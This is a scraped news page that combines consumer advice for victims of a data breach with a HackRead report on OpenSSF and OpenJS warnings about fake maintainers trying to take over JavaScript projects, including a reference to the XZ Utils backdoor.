*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check your digital footprint**

Malwarebytes has a new free tool for you to check if your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Giant Tiger breach sees 2.8 million records leaked 

By Deeba Ahmed
Alarming social engineering attacks target critical open-source projects! Learn how to protect your project and the open-source community from takeovers.
This is a post from HackRead.com Read the original post: OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects

The open-source software community, the foundation of modern technology, is facing a growing threat from social engineering attacks. The Open Source Security (OpenSSF) and OpenJS Foundations issued alerts for social engineering takeovers of open-source projects after unknown malicious actors tried to gain control of an OpenJS-hosted project.

****The Attack****

The OpenJS Foundation Cross Project Council, which hosts popular JavaScript projects used by billions of websites, recently received a series of emails requesting updates to one of its popular JavaScript projects for addressing critical vulnerabilities, with no specifics. The authors wanted OpenJS to designate them as new maintainers although none had privileged access to the project. 

The good news, according to OpenSSF’s blog post, is that the OpenJS Foundation had effective security measures in place, which prevented unauthorized access to the project. The Foundation, demonstrating commendable proactiveness, reported the incident to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Homeland Security.

This approach resembles a recent incident involving the XZ Utils project, a popular data compression tool, where a malicious actor named Jia Tan infiltrated it by gaining the trust of its maintainer. The attack involved claims of expertise and malicious code insertion.

Soon after, a backdoor in xz/liblzma was discovered on the oss-security mailing list, affecting xz compression tools and libraries with versions 5.6.0 and 5.6.1. Fortunately, the compromise was discovered before widespread damage occurred.

Open-source software can pose threats to any part of the supply chain, but the community’s due diligence and oversight can always ensure quick detection and resolution. 

Open-source maintainers should be cautious against social engineering by implementing measures like Multi-Factor Authentication (MFA), granting contributors the right access, conducting rigorous code reviews, fostering a strong community, and being wary of unsolicited help. Limiting privileges can add additional security, while also being cautious of individuals offering “critical” updates or requesting access.

****Open Source Tools = Lucrative Target****

Over 30 million open-source projects are hosted on the GitHub platform, highlighting their widespread adoption by individuals and businesses. However, this vast number also makes these projects lucrative targets for cybercriminals.

For instance, a few months ago, a new hacker group called GambleForce was discovered exploiting open-source tools to compromise their targets successfully. This has encouraged initiatives such as bug bounty programs from Google and the EU (European Union) specifically for Open Source tools.

****Experts Opinion****

Chris Hughes – chief security advisor at open source security company, Endor Labs and Cyber Innovation Fellow at CISA, where he focuses on supply chain security – says these attack attempts are not surprising, but they do raise awareness of bigger OSS security issues.

“It is not surprising at all to hear about these increased social engineering takeover attempts and these will increase with the recent xz utilities example providing insight to malicious actors on how to conduct this attack, in fact we can likely suspect that many of these are already underway and may have already been successful but haven’t been exposed or identified yet. ” Chris warned.

1.  Enhancing Team Coordination With Open-Source Tools
2.  Patched OpenSSH Exploited for IoT, Linux Cryptomining
3.  Dark Web Pedophiles Using Open-Source AI to Generate CSAM
4.  Use of open-source libraries left web apps vulnerable to attacks

Tag

#auth